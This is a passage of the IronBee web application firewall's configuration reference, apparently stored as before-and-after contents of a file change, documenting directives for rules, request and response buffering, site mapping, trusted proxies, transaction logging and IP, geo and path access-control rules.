...`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.8\n|===============================================================================\n\nThe protection engine allows setting options; `ProtectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n----------------------------\nProtectionEngineOptions none\n----------------------------\n\nThe above resets the inspection to *none*.\n\nLater, in a sub-context, you may wish to enable blocking and thus can\njust specify this with the + operator:\n\n-----------------------------------------\n<Location \/some\/path>\n ProtectionEngineOptions +blockingMode\n<\/Location>\n-----------------------------------------\n\nIf you already had blocking mode enabled, but did not want it any more,\nyou would write:\n\n-----------------------------------------\n<Location \/some\/other\/path>\n ProtectionEngineOptions -blockingMode\n<\/Location>\n-----------------------------------------\n\nProtection Engine Options::\n* *blockingMode:* Control blocking actions.\n\nProtection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently none)\n* *all:* All options\n\n=== RequestBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body buffer.\n| Syntax|`RequestBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the request body.\n| Syntax|`RequestBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the backend,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nbackend. Request headers will be sent before the first overflow batch.\n\n=== RequestBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body logged to an audit log.\n| Syntax|`RequestBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable request buffering.\n| Syntax|`RequestBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControl request buffering - holding the request during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the request body to be buffered.\n\nNOTE: This may be renamed to `RequestBodyBuffering` in a future release.\n\n=== ResponseBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body buffer.\n| Syntax|`ResponseBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the response body.\n| Syntax|`ResponseBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the client,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nclient. Request headers will be sent before the first overflow batch.\n\n=== ResponseBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body logged to an audit log.\n| Syntax|`ResponseBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable response buffering.\n| Syntax|`ResponseBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControl response buffering - holding the response during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the response body to be buffered.\n\nNOTE: This may be renamed to `ResponseBodyBuffering` in a future release.\n\n=== Rule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule and, in most contexts, enable the rule for execution in that context.\n| Syntax|`Rule TARGET @operator \"param\" id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== RuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where external IronBee rules are loaded.\n| Syntax|`RuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== RuleDisable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Disables a rule from executing in the current configuration context.\n| Syntax|`RuleDisable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All disables are processed after\nenables. See the `RuleEnable` directive for an example.\n\n=== RuleEnable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enables a rule for execution in the current configuration context.\n| Syntax|`RuleEnable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All enables are processed before\ndisables. For example:\n\n------------------------------------------------------------\nInclude \"rules\/big_ruleset.conf\"\n\n<Site foo>\n Hostname foo.example.com\n RuleEnable id:1234\n RuleEnable id:3456 tag:SQLi\n RuleDisable id:5678 tag:experimental tag:heavyweight\n<\/Site>\n------------------------------------------------------------\n\n=== RuleEngineLogData\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the data logged by the rule engine.\n| Syntax|`RuleEngineLogData <options>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe following data type options are supported:\n\n* *tx* - Log the transaction:\n+\n------------------------------------\nTX_START clientip:port site-hostname\n ...\nTX_END\n------------------------------------\n* *requestLine* - Log the HTTP request line:\n+\n-------------------------------------\nREQ_LINE method uri version-if-given \n-------------------------------------\n* *requestHeader* - Log the HTTP request header:\n+\n----------------------\nREQ_HEADER name: value\n----------------------\n* *requestBody* - Log the HTTP request body, possibly in multiple\nchunks:\n+\n------------------\nREQ_BODY size data\n------------------\n* *responseLine* - Log the HTTP response line:\n+\n--------------------------------\nRES_LINE version status message \n--------------------------------\n* *responseHeader* - Log the HTTP response header:\n+\n----------------------\nRES_HEADER name: value\n----------------------\n* *responseBody* - Log the HTTP response body, possibly in multiple\nchunks:\n+\n------------------\nRES_BODY size data\n------------------\n* *phase* - Log the phase about to execute:\n+\n----------\nPHASE name\n----------\n* *rule* - Log the rule executing:\n+\n--------------------\nRULE_START rule-type\n ...\nRULE_END\n--------------------\n* *target* - Log the target being inspected:\n+\n---------------------------------------------------------------------\nTARGET full-target-name {NOT_FOUND|field-type field-name field-value}\n---------------------------------------------------------------------\n* *transformation* - Log the transformation being executed:\n+\n---------------------------------\nTFN tfn-name(param) {ERROR error}\n---------------------------------\n* *operator* - Log the operator being executed:\n+\n------------------------------------------\nOP op-name(param) TRUE|FALSE {ERROR error}\n------------------------------------------\n* *action* - Log the action being executed:\n+\n---------------------------------------\nACTION action-name(param) {ERROR error}\n---------------------------------------\n* *event* - Log the event being logged:\n+\n--------------------------------------------------------------\nEVENT rule-id type action [confidence\/severity] [csv-tags] msg\n--------------------------------------------------------------\n* *audit* - Log the audit log filename being written:\n+\n------------------------\nAUDIT audit-log-filename\n------------------------\n\nThe following alias options are supported:\n\n* *request* - Alias for: *requestLine*, *requestHeader*, *requestBody*\n* *response* - Alias for: *responseLine*, *responseHeader*,\n*responseBody*\n* *ruleExec* - Alias for: *phase*, *rule*, *target*, *transformation*,\n*operator*, *action*, *actionableRulesOnly*\n* *none* - Alias for no data options\n* *all* - Alias for all data options\n* *default* - Alias for: *none*\n\nThe following filter options are supported:\n\n* *actionableRulesOnly* - Filter option indicating that only rules that\nwere actionable (actions executed) are logged - any rule specific\nlogging are delayed\/suppressed until at least one action is executed.\n\n=== RuleEngineLogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the logging level which the rule engine will write logs.\n| Syntax|`RuleEngineLogLevel`\n| Default|`info`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== RuleExt\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule implemented externally, either by loading the rule directly from a file, or referencing a rule that was previously\ndeclared by a module.\n| Syntax|`RuleExt`\n| Default|None\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nTo load a Lua rule:\n\n-------------------------------------------\nRuleExt lua:\/path\/to\/rule.lua phase:REQUEST\n-------------------------------------------\n\n=== RuleMarker\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule marker (placeholder) which will not be executed, but instead should be overridden.\n| Syntax|`RuleMarker id:phase:`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.5\n|===============================================================================\n\nCreates a rule marker (placeholder) which will not be executed, but instead should be\noverridden. The idea is that rule sets can include placeholders for optional custom\nrules which can be overridden, but still allow the rule set writer to maintain execution order.\n\nTo mark and later replace a rule:\n\n-------------------------------------------------------------------------------\nRule ARGS @rx foo id:1 rev:1 phase:REQUEST\n\n# Allow the administrator to set MY_VALUE in another context\nRuleMarker id:2 phase:REQUEST\n\nRule MY_VALUE @gt 0 id:3 rev:1 phase:REQUEST setRequestHeader:X-Foo:%{MY_VALUE}\n\n<Site test>\n Hostname *\n\n Rule &ARGS @gt 5 id:2 phase:REQUEST setvar:MY_VALUE=5\n RuleEnable all\n<\/Site>\n-------------------------------------------------------------------------------\n\nIn the above example, rule id:2 in the main context would be replaced by\nthe rule id:2 in the site context, then the rules would execute id:1,\nid:2 and id:3. If Rule id:2 was not replaced in the site context, then\nrules would execute id:1 then id:3 as id:2 is only a marker\n(placeholder).\n\n=== RuleTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable rule tracing for a rule.\n| Syntax|`RuleTrace <rule-id>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== RuleTraceFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the rule tracing output file.\n| Syntax|`RuleTraceFile <trace-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== SQLiPatternSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Create a named libinjection pattern set from a file.\n| Syntax|`SQLiPatternSet <name> <pattern-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\nThe pattern file is just a text file with one pattern per line.\n\n=== SensorHostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the sensor hostname.\n| Syntax|`SensorHostname <hostname>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== SensorId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique sensor identifier.\n| Syntax|`SensorId <id>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect server hostname and use that as ID?\n\n=== SensorName\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Sensor name.\n| Syntax|`SensorName <name>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== Service\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps IP and Port to a site.\n| Syntax|`Service <ip>:<port>`\n| Default|`*:*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe `Service` directive establishes a mapping between a Site and one or\nIP\/Port pairs. To map hostnames to a Site, see the `Hostname` directive.\n\nIn the simplest case, a site will occupy a single IP\/Port pair:\n\n-----------------------\nService 192.168.32.5:80\n-----------------------\n\nMore often than not, however, several mappings will be used:\n\n------------------------\nService 192.168.32.5:80\nService 192.168.32.6:443\n------------------------\n\nWildcards are permitted for both IP and Port:\n\n----------------------\nService *:80\nService 192.168.32.5:*\n----------------------\n\nTo match any IP address on any Port (which you will need to do in\ndefault sites), use wildcards for both IP and Port, which is the default\nif no `Service` directive is specified for a site:\n\n-----------\nService *:*\n-----------\n\n=== Set\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter.\n| Syntax|`Set <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n.Example\n----------------------------------------------\nSet MY_VAR \"some value\"\n----------------------------------------------\n\n=== Site\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a site.\n| Syntax|`<Site name>...<\/Site>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.1\n|===============================================================================\n\nA site is one of the main concepts in the configurationin IronBee. The idea\nis to have an element to correspond to real-life web sites. With most web\nsites there is an one-to-one mapping to domain names, but our mapping mechanism\nis quite flexible: you can have one site per domain name, many domain names for\na single site, or even have one domain name shared among several sites.\n\nAt the highest level, a configuration will contain one or more sites.\nFor example:\n\n----------------------------------------\n<Site site1>\n Service *:80\n Hostname site1.example.com\n Hostname site1-alternate.example.com\n<\/Site>\n\n<Site site2>\n Service *:80\n Service 10.0.1.2:443\n Hostname site2.example.com\n<\/Site>\n\n<Site default>\n Service *:*\n Hostname *\n<\/Site>\n----------------------------------------\n\nBefore it can process a transaction, IronBee will examine the current\nconfiguration looking for a site to assign the transaction. Sites are\nprocessed in the configured order where the first matching site is\nchosen. A default site can be specified as the last site using wildcards\nwhen all previous sites fail to match. The `Site` directive only\nestablishes configuration boundaries and assigns a unique handle to each\nsite; the `Service` and `Hostname` directives are responsible for the\nmapping.\n\n=== SiteId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique site identifier.\n| Syntax|`SiteId`\n| Default|None\n| Context|Site\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect site hostname and use that as ID?\n\n=== StreamInspect\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a streaming inspection rule, which inspects data as it becomes available, outside rule phases.\n| Syntax|`StreamInspect TARGET @op <param> ...`\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nNormally, rules run in one of the available phases, which happen at\nstrategic points in transaction lifecycle. Phase rules are convenient to\nwrite, because all the relevant data is available for inspection.\nHowever, there are situations when it is not possible to have access to\nall of the data in a phase. This is the case, for example, when a\nrequest body is very large, or when buffering is not allowed.\n\nStreaming rules are designed to operate in these circumstances. They are\nable to inspect data as it becomes available, be it a dozen of bytes, or\na single byte.\n\nThe syntax of the `Inspect` directive is similar to that of `Rule`, but\nthere are several restrictions:\n\n* Only one input can be used. This is because streaming rules attach to\na single data source.\n* The `phase` modifier cannot be used, as streaming rules operate\noutside of phases.\n* Only `REQUEST_BODY_STREAM` and `RESPONSE_BODY_STREAM` can be used as\ninputs.\n* Only the `pm`, and `dfa` operators can be used.\n* Transformation functions are not yet supported.\n\n=== TrustedProxyIPs\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify a list of networks or IP address to trust for X-Forwarded-For handling.\n| Syntax|`TrustedProxyIPs <cidr> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nThis is a list of IP addresses or CIDR blocks that should be trusted or\nnot trusted when handling the X-Forwarded-For header.\n\nNetworks\/IPs may be prefixed with \"+\" indicate it is trusted or \"-\"\nindicate in are untrusted. If the first entry in the list does not have\na \"+\" or \"-\" the trusted\/untrusted list is cleared and the entry is\ntreated as trusted.\n\nExamples:\n\nTrust only 192.168.1.0\/24:\n\n----------------------------------------\nTrustedProxyIPs 192.168.1.0\/24\n----------------------------------------\n\nTrust all but 10.10.10.10:\n\n--------------------------------------\nTrustedProxyIPs -10.10.10.10\n--------------------------------------\n\n=== TrustedProxyUseXFFHeader\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable the use of X-Forwarded-For header.\n| Syntax|`TrustedProxyUseXFFHeader On\\|Off`\n| Default|`On`\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nIf enabled the last address listed in the X-Forwarded-For header as the\nremote address. See _TrustedProxyIPs_ to configure the list of trusted\nproxies. The default behaviour is to trust no proxies.\n\n=== TxDump\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Diagnostics directive to dump (log) transaction data for debugging purposes.\n| Syntax|`TxDump`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|devel\n| Version|0.7\n|===============================================================================\n\nThe event field allows indicating _when_ you want the data to be written\nand is one of:\n\n* *TxStarted* - Transaction started.\n* *TxProcess* - Transaction processing (between request and response).\n* *TxContext* - Transaction configuration context chosen.\n* *RequestStart* - Request started.\n* *RequestHeader* - Request headers have been processed.\n* *Request* - Full request has been processed.\n* *ResponseStart* - Response started.\n* *ResponseHeader* - Response headers have been processed.\n* *Response* - Full response has been processed.\n* *TxFinished* - Transaction is finished.\n* *Logging* - Logging phase.\n* *PostProcess* - Post-processing phase.\n\nThe destination field allows specifying _where_ you want to write the\ndata and is one of the following:\n\n* *stderr* - Write to standard error.\n* *stdout* - Write to standard output.\n* *ib* - Write to the IronBee log file.\n* *file:\/\/* - Write to an arbitrary file, optionally appending to the\nfile if the last character is a *+* character.\n\nThe data field is optional and allows specifying _what_ is to be\nwritten. This can be prefixed with a `+` or a `-` character to enable or\ndisable the data.\n\n* *Basic* - Basic TX data.\n* *Context* - Configuration context data.\n* *Connection* - Connection data.\n* *ReqLine* - HTTP request line.\n* *ReqHdr* - HTTP request header.\n* *RspLine* - HTTP response line.\n* *RspHdr* - HTTP response header.\n* *Flags* - Transaction flags.\n* *Args* - Request arguments.\n* *Data* - Transaction data.\n* *Default* - Default is \"Basic ReqLine RspLine\".\n* *Headers* - All HTTP headers.\n* *All* - All data.\n\nExamples:\n\n----------------------------------------------\nTxDump TxContext ib Basic +Context\nTxDump PostProcess file:\/\/\/tmp\/tx.txt All\nTxDump Logging file:\/\/\/var\/log\/ib\/all.txt+ All\nTxDump PostProcess StdOut All\n----------------------------------------------\n\n=== TxLogEnabled\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable the transaction log.\n| Syntax|`TxLogEnabled On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n=== TxLogIronBeeLog\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable writting the transaction log to the IronBee log.\n| Syntax|`TxLogIronBeeLog`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n\n=== TxVars\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable additional transaction vars for testing.\n| Syntax|`TxVars On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txvars\n| Version|0.9\n|===============================================================================\n\nThis will enable additional vars (data fields)::\n* *ENGINE_ID* - Engine ID\n* *SENSOR_ID* - Sensor ID\n* *CONN_ID* - Connection ID\n* *CONN_START* - When the connection started\n* *TX_ID* - Transaction ID\n* *TX_START* - When the transaction started\n* *CONTEXT_NAME* - Name of the selected configuration context\n* *SITE_ID* - Selected site ID\n* *SITE_NAME* - Selected site name\n* *LOCATION_PATH* - Selected location path\n\n=== XRuleGeo\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended geo rule.\n| Syntax|`XRuleGeo`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleGeo is used to setup Geo (country) based rules.\n\nExample:\n--------------------------------------\nXRuleGeo US scaleThreat=0.8 priority=1\n--------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleIpv4\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv4 rule.\n| Syntax|`XRuleIpv4`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv4 is used to setup IPv4 based rules.\n\nExample:\n-----------------------------------------\nXRuleIpv4 192.168.0.0\/16 block priority=1\n-----------------------------------------\n\nAvailable Actions:\n\n* *priority=N* - Set rule priority.\n* *block* - Block the transaction.\n* *allow* - Allow the transaction.\n* *enableBlockingMode* - Enable blocking mode for this transaction.\n* *disableBlockingMode* - Disable blocking mode for this transaction\n* *scaleThreat=X* - Scale threat calculation (update\n*XRULES:SCALE_THREAT*) by floating point multiplier, X, for this\ntransaction.\n* *enableRequestHeaderInspection* - Enable request header inspection for\nthis transaction.\n* *disableRequestHeaderInspection* - Disable request header inspection\nfor this transaction.\n* *enableRequestURIInspection* - Enable request URI inspection for this\ntransaction.\n* *disableRequestURIInspection* - Disable request URI inspection for\nthis transaction.\n* *enableRequestParamInspection* - Enable request parameter inspection\nfor this transaction.\n* *disableRequestParamInspection* - Disable request parameter inspection\nfor this transaction.\n* *enableRequestBodyInspection* - Enable request body inspection for\nthis transaction.\n* *disableRequestBodyInspection* - Disable request body inspection for\nthis transaction.\n* *enableResponseHeaderInspection* - Enable response header inspection\nfor this transaction.\n* *disableResponseHeaderInspection* - Disable response header inspection\nfor this transaction.\n* *enableResponseBodyInspection* - Enable response body inspection for\nthis transaction.\n* *disableResponseBodyInspection* - Disable response body inspection for\nthis transaction.\n\n=== XRuleIpv6\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleIpv6`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv6 is used to setup IPv6 based rules.\n\nExample:\n----------------------------------\nXRuleIpv6 ::1\/128 block priority=1\n----------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRulePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended path rule.\n| Syntax|`XRulePath`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRulePath is used to setup URI path based rules.\n\nExample:\n--------------------------------------------------------------\nXRulePath \/admin scaleThreat=1.5 enableBlockingMode priority=1\n--------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleRequestContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended request content type rule.\n| Syntax|`XRuleRequestContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleRequestContentType is used to setup request contetnt type based\nrules.\n\nExample:\n-------------------------------------------------------------------------------------\nXRuleRequestContentType application\/x-www-form-urlencoded enableRequestBodyInspection\n-------------------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleResponseContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleResponseContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleResponseContentType is used to setup response content type based\nrules.\n\nExample:\n----------------------------------------------------------------\nXRuleResponseContentType image\/png disableResponseBodyInspection\n----------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleTime\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended time rule.\n| Syntax|`XRuleTime`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleTime is used to setup date\/time based rules.\n\nThe time-spec is in the format: `[!]DOW(,DOW)*@HH:MM-HH:MM[-|+]ZZZZ`:\n\n* *!* - Invert rule.\n* *DOW* - Day of Week (0=Sunday - 6=Saturday).\n* *HH* - Two digit hour (24-hr format).\n* *MM* - Two digit minute.\n* *[-|+]ZZZZ* - Timezone offset from GMT\n\nExample:\n------------------------------------------------------------------------\nXRuleTime !1,2,3,4,5@08:00-17:00-0500 scaleThreat=1.5 enableBlockingMode\n------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n","old_contents":"IronBee Configuration\n---------------------\n\nThe IronBee configuration is loaded from the server container.\nThe syntax is similar to the Apache httpd server configuration.\nThe following rules apply:\n\n* Escape sequences are as in JavaScript (section 7.8.4 in ECMA-262),\nexcept within PCRE regular expression patterns, where PCRE escaping is\nused\n* Lines that begin with `#` are comments\n* Lines are continued on the next line when `\\` is the last character on\na line\n\nThe IronBee configuration defines general configuration as well as site\nand location mappings, which can each have their own configuration.\n\n-----------------------------------------------\n# Main Configuration\nSensorId 13AABA8F-2575-4F93-83BF-C87C1E8EECCE\n...\n\n# Site1\n<Site site1>\n SiteId 0B781B90-CE3B-470C-952C-5F2878EFFC05\n Hostname site1.example.com\n Service 10.0.1.100:80\n\n ...\n\n <Location \/directory1>\n ...\n <\/Location>\n<\/Site>\n\n# Site2\n<Site site2>\n SiteId 8B3BA3DE-2727-4737-9230-4A1D110E6C87\n Hostname site2.example.com\n Service 10.0.5.100:80\n\n ...\n<\/Site>\n\n# Default Site\n<Site default>\n SiteId F89E43B3-EB96-44F0-BE1C-B4673B96DF9C\n Hostname *\n Service *:*\n\n ...\n<\/Site>\n-----------------------------------------------\n\nThe following is a reference for all IronBee directives where the\ncontext refers to the possible locations within the configuration file.\n\n=== Action\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule that will always execute its actions and, in most contexts, enable the rule for execution in that context.\n| Syntax|`Action id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nThis is shorthand and functionally equivilant to a rule with no targets\nand an operator that always returns true. Internally this is represented as\nfollows.\n\n-----------------------------------------------\n# These are equivilents\nRule NULL @nop \"\" ...\nAction ...\n-----------------------------------------------\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== AuditEngine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the audit log engine.\n| Syntax|`AuditEngine On \\| Off \\| RelevantOnly`\n| Default|`RelevantOnly`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\nSetting `AuditEngine` to `RelevantOnly`, the default, does not log any\ntransactions in itself. Instead, further activity (e.g., a rule match)\nis required for a transaction to be recorded. Setting 